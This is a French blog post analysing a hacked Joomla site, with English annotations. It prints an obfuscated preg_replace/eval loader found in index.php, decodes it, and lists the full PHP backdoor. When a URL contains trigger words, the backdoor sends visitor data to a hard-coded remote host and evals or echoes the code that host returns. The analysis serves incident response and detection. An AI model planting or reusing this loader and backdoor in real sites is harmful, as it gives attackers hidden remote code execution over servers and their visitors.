Analyse d’une attaque / d’un Hack Joomla

1) Joomla est hacké

2) Analyse des sources

Dans l’index.php

// Loader found in index.php. The "e" modifier (deprecated in PHP 5.5, removed in
// PHP 7) makes preg_replace() evaluate the replacement string as PHP code for each
// match of /.+/ against the subject "." (third argument), i.e. exactly once per request.
// The \x escapes in the replacement spell eval(gzinflate(base64_decode('…'))); — see
// the "Traduction" step below — so the compressed base64 blob is executed silently.
// Detection hint: search PHP files for preg_replace() with an /e pattern and for
// \x-escaped eval / gzinflate / base64_decode sequences.
// (Guillemets « » stand for plain double quotes, mangled by the blog typography.)
preg_replace(« /.+/e », »\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28’nVVrb9owFP1Mf4Ur0TqZIJRp2qQixFBJW6QWmAl7iKLIBEOshThywtSH+O+7jkOgPNqx9kNj33N9zzm+vp0xOTfM2sl0EXoJFyGapRvo5aRQpEPMIzxC6U8dIgmPFDaNLGSQhdLIQAY65NExlRMewjYOhWQTLjHs86kRJzISsZEnlxAOhIiweVqvT2kQM/OFeb4wcM7Fo0HAJkNs5TkWpKn1qgqssVlbqvPRboEcZtazEuj8HO3AsJgJnENS7Ufx5eEfGvAJUqiUTEGyZCFDkL08UjlLPH99jkrwRZxoo+voa9Ht2+S7TYZY/3U7zXsbj7IroTMWauwr6K3j9NwBrNzmjd1xcrhkUyaZhIRdOLGvbWITjWXjQGgC2E+S6LJSiRlYJmYBsxZxhUbi2a+E1F9wK/KjxoQmtI6tMY3Z508uCz0xYUbMJAeTnhm4YOpG8VVdD8S6POSJkZYxdaucQvT4e4iF95slaMJjOoa+2XMXulzMEhFBQc8voasBuev2HBDsDEjHIc1OH5SXqorIYbTTvre7A6eEqhdmDSkxuRb2yDwF1kqQknK8EjaPkickWbwI4Pb39dS62z04pVzW0XJ54yz0kqVkCZFkM3dOocMMfPYwjB5GhvWhYT4MK/B5xjE8l1IRUkzNl0FTG2o9rI6UmAJ75Ikun5IEXbDSm8uTzQGSjgl1hqrKQ5dKSZ+MdYcR+77r2G6z1SLKAx3G1Y9frAv4reLUFnj7aeub5so+OCuGyzC2WvWne90lP5qkZbfUFx5lCZlh6D24krZMZe0kvCK6ozIdebnMPdT6wEUNnJ1dVIenJEKsiRZjz2dztnpesRqXS8TUtNoTxvoKisoc2NtryW2376jajW3xOoAu0eFBsk8Msb8N7L7jDkg7s1eNg0IRmhgoZAQtDIMBRrMiZh3IraWJWtz+Qq02sa8ct39F2r3NgoW82tvg2oFWycHAhvxy+w5pd27WvZIeboHFDWy9m7TqmDdkbPtV+C+z3iyRUYOJtK4R0cTf71EKq73DQ6VvNd+/sO7d9uD77lr9e37l345tG48MDlYv6i8=’\x29\x29\x29\x3B », ». »);

3) Traduction

// Analyst's safe "translation": the same blob, but eval() is replaced by print,
// so the decompressed payload is displayed instead of executed. The result is
// the plain-PHP listing shown in the next section. (Guillemets « » stand for
// plain double quotes, mangled by the blog typography.)
print gzinflate(base64_decode(« nVVrb9owFP1Mf4Ur0TqZIJRp2qQixFBJW6QWmAl7iKLIBEOshThywtSH+O+7jkOgPNqx9kNj33N9zzm+vp0xOTfM2sl0EXoJFyGapRvo5aRQpEPMIzxC6U8dIgmPFDaNLGSQhdLIQAY65NExlRMewjYOhWQTLjHs86kRJzISsZEnlxAOhIiweVqvT2kQM/OFeb4wcM7Fo0HAJkNs5TkWpKn1qgqssVlbqvPRboEcZtazEuj8HO3AsJgJnENS7Ufx5eEfGvAJUqiUTEGyZCFDkL08UjlLPH99jkrwRZxoo+voa9Ht2+S7TYZY/3U7zXsbj7IroTMWauwr6K3j9NwBrNzmjd1xcrhkUyaZhIRdOLGvbWITjWXjQGgC2E+S6LJSiRlYJmYBsxZxhUbi2a+E1F9wK/KjxoQmtI6tMY3Z508uCz0xYUbMJAeTnhm4YOpG8VVdD8S6POSJkZYxdaucQvT4e4iF95slaMJjOoa+2XMXulzMEhFBQc8voasBuev2HBDsDEjHIc1OH5SXqorIYbTTvre7A6eEqhdmDSkxuRb2yDwF1kqQknK8EjaPkickWbwI4Pb39dS62z04pVzW0XJ54yz0kqVkCZFkM3dOocMMfPYwjB5GhvWhYT4MK/B5xjE8l1IRUkzNl0FTG2o9rI6UmAJ75Ikun5IEXbDSm8uTzQGSjgl1hqrKQ5dKSZ+MdYcR+77r2G6z1SLKAx3G1Y9frAv4reLUFnj7aeub5so+OCuGyzC2WvWne90lP5qkZbfUFx5lCZlh6D24krZMZe0kvCK6ozIdebnMPdT6wEUNnJ1dVIenJEKsiRZjz2dztnpesRqXS8TUtNoTxvoKisoc2NtryW2376jajW3xOoAu0eFBsk8Msb8N7L7jDkg7s1eNg0IRmhgoZAQtDIMBRrMiZh3IraWJWtz+Qq02sa8ct39F2r3NgoW82tvg2oFWycHAhvxy+w5pd27WvZIeboHFDWy9m7TqmDdkbPtV+C+z3iyRUYOJtK4R0cTf71EKq73DQ6VvNd+/sO7d9uD77lr9e37l345tG48MDlYv6i8= »));

En PHP de base, maintenant :

// Decoded payload, as reproduced by the analyst (curly quotes and dashes are the
// blog's typography; presumably plain ASCII in the original file). Reformatted
// here for readability only — no token has been changed. Overall behaviour, read
// from the code below: germ() runs on every request to index.php, stays silent for
// ordinary visitors, and for "tagged" URLs ships request metadata to a remote
// server and then either eval()s or echoes whatever that server returns.
germ();

// Entry point of the backdoor. Takes no arguments and returns nothing; its only
// effects are an early return, output of remote content, or eval() of remote
// content followed by exit.
function germ() {
    // Request fingerprint that is later sent to the remote server.
    $a[‘ip’] = getip();
    $a[‘url’] = getUrl();
    // Trigger keyword: the code below only proceeds when the URL contains this
    // value ('noredir') or 'ogo'.
    $cabardin = ‘noredir’;
    // 'loop' in the URL enables the author's own debug output; every echo() in
    // this function is gated on the same check.
    if(strpos($a[‘url’], ‘loop’)!==false) {
        echo(‘function called[‘.$a[‘url’].’],[‘.$cabardin.’]’);
    }

    // Quiet path: neither keyword present → return with no side effect, so the
    // infected site behaves normally for a casual check.
    if (strpos($a[‘url’],$cabardin)===false && strpos($a[‘url’],’ogo’)===false) {
        if(strpos($a[‘url’], ‘loop’)!==false){echo(‘invalid url’);}
        return;
    }
    if(strpos($a[‘url’], ‘loop’)!==false){echo(‘fetch url’);}
    // More request metadata; the '@' suppresses any undefined-index notice so
    // nothing is written to the PHP error log.
    $a[‘host’] = @$_SERVER[‘SERVER_NAME’];
    $a[‘agent’] = @$_SERVER[‘HTTP_USER_AGENT’];
    $a[‘referer’] = @$_SERVER[‘HTTP_REFERER’];
    // Call-home: the array is serialised, base64-encoded and sent as a GET
    // parameter to the hard-coded host seogoogle.us. Outbound requests to that
    // host, and the 'data=' base64 parameter, are the network indicators to
    // look for in egress/proxy logs.
    $eblo = ‘http://seogoogle.us/apozh/nahui.php?data=’.base64_encode(serialize($a));
    $ch = @curl_init($eblo);
    if(!$ch) {
        if(strpos($a[‘url’], ‘loop’)!==false){echo(‘socket disabled’);}
        return;
    }
    @curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    @curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $c = @curl_exec($ch);
    if (!$c) {
        if(strpos($a[‘url’], ‘loop’)!==false){echo(’empty resulst’);}
        return;
    }
    // Three possible server answers: a '–return–' marker (do nothing; presumably
    // '--return--' before the dashes were mangled), PHP code wrapped in
    // [p]...[/p] (executed with eval(), then exit), or any other content, which
    // is echoed as the page body (then exit). The eval() on fetched content is
    // what makes this a remote code execution backdoor rather than a redirect.
    if (strpos($c, ‘–return–‘)!==false) {return;}
    if (preg_match(‘%\[p\](.*?)\[/p\]%i’,$c,$ret)) {
        eval($ret[1]);
        exit;
    }
    echo($c);
    exit;
}

// Client address reported to the remote server: REMOTE_ADDR, except that a
// loopback source ('127.0.0.1' / 'localhost') is replaced by the client-supplied
// X-Forwarded-For header when present.
function getip() {
    if (in_array($_SERVER[‘REMOTE_ADDR’], array(‘127.0.0.1’, ‘localhost’))) {
        if (isset($_SERVER[‘HTTP_X_FORWARDED_FOR’])) {
            return $_SERVER[‘HTTP_X_FORWARDED_FOR’];
        }
    }
    return $_SERVER[‘REMOTE_ADDR’];
}

// Rebuilds the absolute URL of the current request from $_SERVER. Note the loose
// '== on' comparison and the duplicated isset($_SERVER['REQUEST_URI']) branch,
// which can never be reached because the first branch already handles it.
function getUrl() {
    if (isset($_SERVER[‘HTTPS’]) && $_SERVER[‘HTTPS’] == ‘on’) {
        $scheme = ‘https’;
    } else {
        $scheme = ‘http’;
    }
    $host = isset($_SERVER[‘HTTP_HOST’]) ? $_SERVER[‘HTTP_HOST’] : $_SERVER[‘SERVER_NAME’];
    if (isset($_SERVER[‘REQUEST_URI’])) {
        $url = $scheme.’://’.$host.$_SERVER[‘REQUEST_URI’];
    } elseif (isset($_SERVER[‘REDIRECT_SCRIPT_URI’])) {
        $url = $_SERVER[‘REDIRECT_SCRIPT_URI’];
        if (isset($_SERVER[‘REDIRECT_QUERY_STRING’])) {
            $url .= ‘?’.$_SERVER[‘REDIRECT_QUERY_STRING’];
        }
    } elseif (isset($_SERVER[‘REQUEST_URI’])) {
        // Unreachable: identical to the first condition.
        $url = $scheme.’://’.$host.$_SERVER[‘REQUEST_URI’];
    } elseif (isset($_SERVER[‘REDIRECT_URL’])) {
        $path = $_SERVER[‘REDIRECT_URL’];
        $url = $scheme.’://’.$host.$path;
    }
    else
    {
        $url = $scheme.’://’.$host.$_SERVER[‘PHP_SELF’].’?’.$_SERVER[‘QUERY_STRING’];
    }

    return $url;
    // The closing brace of getUrl() is missing from the listing as reproduced.

Verdict : il faut mettre à jour ses composants rapidement en cas de faille.